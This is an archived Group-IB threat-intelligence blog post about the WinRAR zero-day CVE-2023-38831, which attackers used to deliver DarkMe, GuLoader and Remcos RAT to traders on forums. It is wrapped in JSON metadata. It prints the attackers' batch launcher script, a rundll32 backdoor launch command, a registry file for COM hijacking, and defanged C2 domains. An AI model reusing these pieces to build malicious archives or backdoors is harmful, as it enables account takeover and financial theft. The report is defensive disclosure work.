{ "id": "f40a0291-1f2e-4e23-a362-c1da14afed5f", "created_at": "2026-04-06T15:52:26.072911Z", "updated_at": "2026-04-10T03:34:23.43278Z", "deleted_at": null, "sha1_hash": "55db8d88cdcccfef3e4414a91013f73ba506f20e", "title": "CVE-2023-38831 zero-Day vulnerability in WinRAR | Group-IB Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 980836, "plain_text": "Andrey Polovinkin\r\nTeam Lead Reverse Research, APAC\r\nTraders' Dollars in Danger: CVE-2023-38831 zero-Day\r\nvulnerability in WinRAR exploited\r\nby cybercriminals to target\r\ntraders\r\nSpoof extensions help cybercriminals target users on trading forums as 130 devices still infected at\r\ntime of writing\r\nAugust 23, 2023 · min to read · Threat Intelligence\r\n← Blog\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 1 of 19\n\nTrading WinRAR zero-Day\r\nWith over 500 million users worldwide, WinRAR is one of the most popular compression tools. You\r\nwould probably struggle to find someone who has never downloaded or opened this vital tool. If\r\nsomebody receives an archive in an email with malicious content, they will most likely open it with\r\nWinRAR. Consequently, threat actors invest time in identifying vulnerabilities in this and other\r\npopular programs commonly utilized by internet users.\r\nOn July 10, 2023, while researching the spread of DarkMe malware the Group-IB Threat Intelligence\r\nunit came across a previously unknown vulnerability in the processing of the ZIP file format by\r\nWinRAR. By exploiting a vulnerability within this program, threat actors were able to craft ZIP\r\narchives that serve as carriers for various malware families. Weaponized ZIP archives were\r\ndistributed on trading forums. Once extracted and executed, the malware allows threat actors to\r\nwithdraw money from broker accounts. This vulnerability has been exploited since April 2023.\r\nUpon discovering the processing error in opening the file in the ZIP archive, which was exploited\r\nby the threat actors as an unspecified malicious functionality, and assessing the identified security\r\nflaw, Group-IB immediately notified RARLAB about the findings and worked closely with the\r\ncompany’s development team to resolve the security issue. Group-IB researchers also attempted to\r\nreach out to the MITRE Corporation on July 12, 2023 to request the assignment of a CVE number\r\nto the identified vulnerability. On August 15, 2023, MITRE Corporation assigned this zero-day\r\nvulnerability the marker CVE-2023-38831.\r\nWe would like to thank the team at RARLAB and especiallyEugene Roshal, the main developer of\r\nthe RAR file format, WinRAR file archiver, and the FAR file manager, among others. The RARLAB\r\nteam immediately responded to our request and fixed the vulnerability in very short notice. The beta\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 2 of 19\n\nversion of the patch was issued on July 20, 2023, and the final updated version of WinRAR (version\r\n6.23) was released on August 2, 2023.\r\nWe highly recommend that all users install the latest version of\r\nWinRAR\r\nIn this blog post, we document our discovery of this zero-day vulnerability that can be exploited\r\nby cybercriminals. We found that threat actors use the identified vulnerability to deliver a variety of\r\nmalware families, putting unsuspecting users at risk. As part of our investigation, we monitored the\r\ndistribution of these dangerous ZIP archives to specialized forums where cybercriminals shared their\r\nmalicious payloads. Once infected, the consequences can be serious, with cybercriminals using their\r\naccess to withdraw funds from brokerage accounts.\r\nBe sure to follow Group-IB’s blog, which highlights the latest cybersecurity threats and provides\r\nvaluable insights to protect your digital assets and data.\r\nKey Findings\r\nGroup-IB Threat Intelligence unit identified a zero-day vulnerability has been used in WinRAR\r\nsince April 2023\r\nThe cybercriminals are exploiting a vulnerability that allows them to spoof file extensions, which\r\nmeans that they are able to hide the launch of malicious script within an archive masquerading\r\nas a ‘.jpg’, ‘.txt’, or any other file format\r\nThis vulnerability was reported to RARLAB, which subsequently issued a new version of\r\nWinRAR\r\nThe vulnerability was reported to MITRE Corporation, and was assigned CVE-2023-38831.\r\nA ZIP archive was crafted to deliver various malware families: DarkMe, GuLoader, Remcos RAT\r\nThe ZIP archives were distributed in specialist forums for traders\r\n130 traders’ devices are still infected at the moment of posting. Group-IB cannot confirm the\r\ntotal number of devices that were infected as a result of this vulnerability.\r\nAfter infecting devices, the cybercriminals withdraw money from broker accounts. The total\r\namount of financial losses is still unknown.\r\nThe cybercriminals are exploiting this vulnerability to deliver the same tool used in the\r\nDarkCasino campaign described by NSFOCUS (Part 1, Part 2).\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 3 of 19\n\nInitially, our research led us to believe that this was a known evolution of a vulnerability previously\r\ndiscovered by security researcher Danor Cohen in 2014. A method of modifying the ZIP header to\r\nspoof file extensions was observed, but further investigation revealed that this was not the case.\r\nInstead, our analysis revealed the existence of a new vulnerability in WinRAR.\r\nInitial access\r\nWhile monitoring the activity of DarkMe malware family in the wild, Group-IB recently identified a\r\nnumber of suspicious ZIP archives. A thorough analysis of these archives revealed an anomaly in\r\ntheir behavior that prompted us to investigate the files in more detail.\r\nThe discovered ZIP archives, targeted at traders specifically, were posted by the threat actors\r\nbehind this campaign on public forums where traders frequently engage in discussions and share\r\nuseful information with each other. In most cases, the archive was attached to the post (as in Figure\r\n1 below), but in some cases the malicious ZIP archive was distributed on a free-to-use service to\r\nstore files called catbox.moe. In total, Group-IB discovered that these malicious ZIP archives were\r\nposted on at least eight popular trading forums.\r\nTaking one of the affected forums as an example, some of the administrators became aware that\r\nharmful files were being shared on the forum, and subsequently issued a warning to users. Despite\r\nthis warning, further posts were made and more users were affected. Our researchers also saw\r\nevidence that the threat actors were able to unblock accounts that were disabled by forum\r\nadministrators to continue spreading malicious files, whether by posting in threads or sending\r\nprivate messages.\r\nFigure 1. Example of a post made by threat actor\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 4 of 19\n\nWhen the crafted ZIP archives reached the systems of the targeted traders, the malware payloads\r\ncontained inside the archives were executed, leading to their devices being compromised.\r\nAccording to one of the victims (Figure 7), the cybercriminals gained unauthorized access to their\r\nbroker accounts, which meant that the bad actors were able to perform illicit financial transactions\r\nand withdraw funds. We have no evidence to confirm that the opening of the archive and the\r\nunauthorized access to the account are related, but we strongly believe that this is no coincidence.\r\nThe withdrawal was unsuccessful and the hackers were only able to conduct a handful of trades\r\nthat led to the victim suffering a small loss of $2. See the victim’s comment below.\r\nFigure 7. A victim’s post about an unsuccessful cyber attack\r\nFigure 5. Admin notification of malicious RAR file distribution for forum users\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 5 of 19\n\nLet’s examine the potential consequences of opening a malicious ZIP archive. When a victim opens\r\nthis sort of file what do they see? Well, it depends onthe bait text that they encounter, which in this\r\nparticular case, was posted on trading forums. So for example, in this scheme we saw cybercriminals\r\npretending to offer their “best Personal Strategy to trade with bitcoin” (see Figure 3 and Figure\r\n4), and attach the malicious archives to these posts. In other instances, the attackers gain access to\r\nforum accounts and share harmful files in existing threads, pretending they are collections of scripts\r\nto calculate different indicators, like the file named “Omnis averages.zip” (see Figure 1 above).\r\nAll the archives we identified were created using the same method. They also all had a similar\r\nstructure, consisting of a decoy file and a folder containing a mix of malicious and unused files. If\r\nthe user opens the decoy file, which appears as a .txt, .jpg. or another file extension in WinRAR, a\r\nmalicious script is instead executed.\r\nFigure 8. The sequence diagram of the file extension spoofing exploit (CVE-2023-38831)\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 6 of 19\n\nUpon discovering this process, Group-IB experts were able to conclude that the cybercriminals are\r\nexploiting a previously unknown vulnerability in WinRAR, later assigned the number CVE-2023-\r\n38831. This vulnerability allows malicious actors to hide the launching of malicious script by creating\r\ndecoys with spoof extensions.\r\nAnalysis of vulnerability exploitation\r\nThe cybercriminals are exploiting a vulnerability that allows them to spoof file extensions, which\r\nmeans that they are able to hide the launch of malicious code within an archive masquerading as a\r\n‘.jpg’, ‘.txt’, or any other file format. They create a ZIP archive containing both malicious and non-malicious files. When the victim opens a specially crafted archive, the victim will usually see an image\r\nfile and a folder with the same name as the image file.\r\nFigure 9. An example of a malicious ZIP archive containing a file with a spoofed extension\r\nIf the victim clicks on the decoy file, which can masquerade as an image, a script is executed that\r\nlaunches the next stage of the attack. This process is illustrated in Figure 10 (below).\r\nFigure 10. Group-IB Managed XDR process creation graph\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 7 of 19\n\nDuring our investigation, we noticed that the ZIP archive has a modified file structure. There are two\r\nfiles in the archive: a picture and a script. Instead of the image opening, the script is launched. The\r\nscript’s main purpose is to initiate the next stage of the attack. This is done by running a minimized\r\nwindow of itself. It then searches for two specific files, namely “Screenshot_05-04-2023.jpg” and\r\n“Images.ico.” The JPG file is an image that the victim opened initially. “Images.ico” is an SFX CAB\r\narchive designed to extract and launch new files. Below is an example of the script:\r\n@echo off\r\nif not DEFINED IS_MINIMIZED\r\n set IS_MINIMIZED=1 \u0026\u0026 start \"\" /min \"%~dpnx0\" %* \u0026\u0026 exit\r\n cd %TEMP%\r\n for /F \"delims=\" %%K in ('dir /b /s \"Screenshot_05-04-2023.jpg\"') do\r\n for /F \"delims=\" %%G in ('dir /b /s \"Images.ico\"') do\r\n WMIC process call create \"%%~G\" \u0026\u0026 \"%%~K\" \u0026\u0026 cd %CD% \u0026\u0026 exit\r\nexit\r\nTo understand how the vulnerability works, we created two archives that mimic the\r\ndiscovered archive’s structure. Both archives contain an image file, and each archive also\r\nincludes an inner folder with a single file that stores a script, triggering a message box display. Next,\r\nwe modified one of the archives to resemble the archive used by the cybercriminals and compared\r\nhow WinRAR behaved in each case.\r\nSpecifically, we wanted to determine what files will be created in the %TEMP%/%RARTMPDIR%\r\nfolder when opening the archives created during the previous step. In the original ZIP file, only the\r\nimage.jpg file is created. In the case of the specially crafted ZIP archive, however, the contents of\r\nthe folder will also be extracted.\r\nFigure 11. Comparing the list of files that are created when WinRAR opens different archives\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 8 of 19\n\nAs you can see, in the case of the modified version of the archive, WinRAR extracts both files,\r\nensuring that the attack is at least partially successful. In the interest of brevity, we will not focus on\r\nall the details of the vulnerability, but instead provide a brief explanation.\r\nThe main phase of the attack occurs when WinRAR attempts to open the file that the user wants to\r\naccess. The ShellExecute function receives the wrong parameter to open the file. The picture’s file\r\nname will not match the search criteria, resulting in it being skipped. Instead of finding the intended\r\npicture, the batch file is discovered and executed.\r\nFigure 12. Demonstration of reproducing vulnerability\r\nDarkMe\r\nIn mid-2022, NSFOCUS researchers discovered (Part 1, Part 2) a type of malware called DarkMe\r\nduring their investigation into the DarkCasino campaign. DarkMe is a VisualBasic spy Trojan first\r\nspotted in September 2021. NSFOCUS has attributed DarkMe to a financially motivated group\r\ncalled Evilnum, which is known for targeting financial organizations.\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 9 of 19\n\nFigure 13. APT Evilnum profile in Group-IB Threat Intelligence portal\r\nThe launch process for DarkMe is complex and involves multiple modules. First, the script\r\nmentioned earlier launches the Cabinet Self-extractor file. A Cabinet Self-extractor file, commonly\r\nknown as an SFX CAB file, is a type of archive file that contains compressed data and is designed\r\nto extract its contents automatically. The archive contains 5 files, and the main entry will be the\r\n‘cc.exe‘ file, which is launched after extraction.\r\nFigure 14. List of files in the SFX CAB archive\r\nAll executables are written in VisualBasic language. As mentioned above, the initial execution is\r\nperformed by the SFX archive, which runs “cc.exe”. Despite its relatively small functionality, the\r\ncc.exe executable plays a crucial role in initiating various malicious modules. The cc.exe executable\r\nhas a few possible forms, and two of them have special elements called custom ActiveX controls.\r\nThese controls are saved in files with the extension “.ocx“. When the program runs, these custom\r\ncontrols are loaded automatically and perform their malicious tasks.\r\nIn our case, we have two user controls that serve different functions. The first control is\r\nresponsible for registering a COM object in Windows. During the registration process, registry keys\r\nare imported from the “add.txt” file. As a result, a specific COM object with a unique CLSID is\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 10 of 19\n\nregistered in the infected system. The default value of the InprocServer32 key is populated with the\r\npath to a malicious DLL named “Cabinet.ocx”.\r\nFigure 15. Group-IB Managed XDR process diagram of the start of DarkMe\r\nThe second user control creates the file named “Cabinet.ocx“, whose path is inserted into the\r\nInprocServer32 registry key. The actual content of Cabinet.ocx is stored within the “fu.png” file,\r\nfollowing the key phrase “tanzapinz1AM”.\r\nFigure 16. Demonstration of a DarkMe sample in the image\r\nBoth user controls defined by the threat actors launch and work at the same time. The control flow\r\nof each is managed by the delays in each module. Finally, сс.exe kills itself and launches the\r\nDarkMe backdoor using the command below:\r\nrundll32.exe /sta {EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 11 of 19\n\nAll the discovered DarkMe samples contained in the discovered ZIP variants used the domain name\r\n87iavv[.]com as the C2, but in one case they used tganngs9[.]com. Using Group-IB’s proprietary\r\nand patented Graph Network Analysis tool, another DarkMe C2 was discovered\r\n(trssp05923[.]com and 12jyyu06[.]com) at the same IP address.\r\nFigure 17. Outline of network relationships. Source:Group-IB Graph Network Analysis tool\r\nCloudEye aka GuLoader\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 12 of 19\n\nWe made another noteworthy discovery during our analysis. We found ZIP variants that used NSIS\r\ninstallers instead of SFX archives. The NSIS script has many unnecessary function calls, which\r\nmakes it harder to analyze. Surprisingly, the NSIS package includes the original NSIS script with\r\ncomments, which made our analysis much easier. In addition, some comments in the script include\r\nItalian words such as SHELL_PATH_ETICHETTA and FILE_VITALE.\r\nFigure 18. The original NSIS installation script\r\nOnce the initial setup is done, different PowerShell scripts will run to launch the final payload. These\r\nscripts are designed to be hard to understand, so we won’t go into details seeing as they are not\r\nparticularly important for our purposes. The NSIS package starts the launch by running the PS\r\nscript stored in the file “Piskens.For187“, which is inside the package. This process also includes\r\ndecrypting and running another stage, leading to the launch of CloudEye, also known as\r\nGuLoader. The package has another file called “Fibrolipoma.Ato“, which contains the GuLoader\r\nvariant. This file is read, and its offset to shellcode is passed to the EnumResourceTypesW\r\nfunction.\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 13 of 19\n\nFigure 19. Group-IB Managed XDR process diagram of the start of GuLoader\r\nGuLoader then attempts to get to the next stage by making an HTTP request using the URL\r\nhXXps://corialopolova[.]com/idSqdvTuMawZBj41.bin. According to Group-IB Threat Intelligence,\r\nthe cybercriminals used this domain between April 17, 2023 and July 18, 2023. After the payload is\r\ndownloaded and decrypted, Remcos RAT is executed. To communicate with the cybercriminals, the\r\ndomain mmnedgeggrrva[.]com is used.\r\nThreat Attribution\r\nAlthough we did identify the DarkMe Trojan, which is allegedly associated with EvilNum and is\r\ndistributed together with a widely-used remote access tool, we cannot conclusively link the\r\nidentified campaign to this financially motivated group. It is highly probable that similar tools from\r\nthe same developer can be found on underground forums. We continue to closely monitor this\r\nmalicious threat and will provide updates as they become available.\r\nConclusion\r\nRecent cases of exploitation of CVE-2023-38831 remind us of the constant risks connected to\r\nsoftware vulnerabilities. Threat actors are highly resourceful, and they will always find new ways to\r\ndiscover and subsequently exploit vulnerabilities such as the one outlined in this blog.\r\nOrganizations and individuals alike must remain vigilant, keep their systems updated, and follow\r\nsecurity guidelines if they want to avoid falling victim to such attacks. It’s also essential for security\r\nresearchers and software developers to work together and quickly identify and fix vulnerabilities,\r\nthereby making it harder for cybercriminals to take advantage of them.\r\nJoin the Cybercrime Fighters Club\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 14 of 19\n\nThe global fight against cybercrime is a collaborative effort, and that’s why we’re\r\nlooking to partner with industry peers to research emerging threats and publish joint\r\nfindings on our blog\r\nRecommendations\r\nATT\u0026CK\r\nJoin\r\nRegularly update your operating system, applications, and security software to ensure you have\r\nthe latest security patches. Update WinRAR to the latest version.\r\n1.\r\nStay informed about common cyber threats and tactics used by cybercriminals. This knowledge\r\ncan help you recognize potential risks and avoid falling victim to scams.\r\n2.\r\nBe very cautious when dealing with attachments from unknown sources. Avoid running on files\r\nthat you weren’t expecting or don’t recognize.\r\n3.\r\n4. Encourage the use of password managers for the storage of login data.\r\n5. Enable 2FA wherever possible to add an extra layer of security to your accounts.\r\n6. Backup your important data regularly to an external device.\r\nFollow the principle of least privilege by using standard user accounts instead of administrator\r\naccounts for daily tasks.\r\n7.\r\nInitial access arrow_drop_down\r\nExecution arrow_drop_down\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 15 of 19\n\nPersistence arrow_drop_down\r\nPrivilege escalation arrow_drop_down\r\nDefense Evasion arrow_drop_down\r\nCredential Access arrow_drop_down\r\nDiscovery arrow_drop_down\r\nLater Movement arrow_drop_down\r\nCollection arrow_drop_down\r\nCommand and Control arrow_drop_down\r\nExfiltration arrow_drop_down\r\nImpact arrow_drop_down\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 16 of 19\n\nAPPENDIX A. Example of a script to register a COM object\r\nWindows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}]\r\n@=\"Cabinet.ModuleClassK\"\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\\Implement\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\\Implement\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\\InprocSer\r\n@=\"Cabinet.ocx\"\r\n\"ThreadingModel\"=\"Apartment\"\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\\ProgID]\r\n@=\"Cabinet.ModuleClassK\"\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\\Programma\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\\TypeLib]\r\n@=\"{8F1576C0-BB08-4F05-87A6-268C0D548794}\r\n[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{EA6FC2FF-7AE6-4534-9495-F688FEC7858C}\\VERSION]\r\n@=\"1.0\"\r\nIOCs\r\nFiles arrow_drop_down\r\nDomains arrow_drop_down\r\nIP addresses arrow_drop_down\r\nRegistry path arrow_drop_down\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 17 of 19\n\nShare this article\r\nFound it interesting? Don't hesitate to share it to wow your friends or colleagues\r\nFile path arrow_drop_down\r\nResources\r\nResearch Hub\r\nSuccess Stories\r\nKnowledge Hub\r\nCertificates\r\nWebinars\r\nPodcasts\r\nTOP Investigations\r\nRansomware Notes\r\nAI Cybersecurity Hub\r\nProducts\r\nThreat Intelligence\r\nFraud Protection\r\nManaged XDR\r\nAttack Surface Management\r\nDigital Risk Protection\r\nBusiness Email Protection\r\nCyber Fraud Intelligence\r\nPlatform\r\nUnified Risk Platform\r\nIntegrations\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 18 of 19\n\nPartners\r\nPartner Program\r\nMSSP and MDR Partner\r\nProgram\r\nTechnology Partners\r\nPartner Locator\r\nCompany\r\nAbout Group-IB\r\nTeam\r\nCERT-GIB\r\nCareers\r\nInternship\r\nAcademic Aliance\r\nSustainability\r\nMedia Center\r\nContact\r\nAPAC: +65 3159 3798\r\nEU \u0026 NA: +31 20 226 90 90\r\nMEA: +971 4 568 1785\r\ninfo@group-ib.com\r\n© 2003 – 2026 Group-IB is a global leader in the fight against cybercrime, protecting customers\r\naround the world by preventing breaches, eliminating fraud and protecting brands.\r\nTerms of Use Cookie Policy Privacy Policy\r\nSubscription plans Services Resource Center\r\nSubscribe to stay up to date with the\r\nlatest cyber threat trends\r\nContact\r\nhttps://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\r\nPage 19 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/" ], "report_names": [ "cve-2023-38831-winrar-zero-day" ], "threat_actors": [ { "id": "059b16f8-d4e0-4399-9add-18101a2fd298", "created_at": "2022-10-25T15:50:23.29434Z", "updated_at": "2026-04-10T02:00:05.380938Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "Evilnum" ], "source_name": "MITRE:Evilnum", "tools": [ "More_eggs", "EVILNUM", "LaZagne" ], "source_id": "MITRE", "reports": null }, { "id": "0bc63952-5795-4fc7-85c1-50a7f207f2f0", "created_at": "2023-11-14T02:00:07.095723Z", "updated_at": "2026-04-10T02:00:03.450401Z", "deleted_at": null, "main_name": "DarkCasino", "aliases": [], "source_name": "MISPGALAXY:DarkCasino", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "a5bd315b-6220-441f-8ed1-39e194dcd0e3", "created_at": "2023-12-01T02:02:33.667762Z", "updated_at": "2026-04-10T02:00:04.641333Z", "deleted_at": null, "main_name": "DarkCasino", "aliases": [ "Water Hydra" ], "source_name": "ETDA:DarkCasino", "tools": [ "CloudEyE", "DarkMe", "GuLoader", "PikoloRAT", "vbdropper" ], "source_id": "ETDA", "reports": null }, { "id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd", "created_at": "2023-01-06T13:46:39.153487Z", "updated_at": "2026-04-10T02:00:03.232006Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "EvilNum", "Jointworm", "KNOCKOUT SPIDER", "DeathStalker", "TA4563" ], "source_name": "MISPGALAXY:Evilnum", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "39ea99fb-1704-445d-b5cd-81e7c99d6012", "created_at": "2022-10-25T16:07:23.601894Z", "updated_at": "2026-04-10T02:00:04.684134Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "G0120", "Jointworm", "Operation Phantom in the [Command] Shell", "TA4563" ], "source_name": "ETDA:Evilnum", "tools": [ "Bypass-UAC", "Cardinal RAT", "ChromeCookiesView", "EVILNUM", "Evilnum", "IronPython", "LaZagne", "MailPassView", "More_eggs", "ProduKey", "PyVil", "PyVil RAT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Taurus Loader TeamViewer Module", "Terra Loader", "TerraPreter", "TerraStealer", "TerraTV" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775490746, "ts_updated_at": 1775792063, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/55db8d88cdcccfef3e4414a91013f73ba506f20e.pdf", "text": "https://archive.orkl.eu/55db8d88cdcccfef3e4414a91013f73ba506f20e.txt", "img": "https://archive.orkl.eu/55db8d88cdcccfef3e4414a91013f73ba506f20e.jpg" } }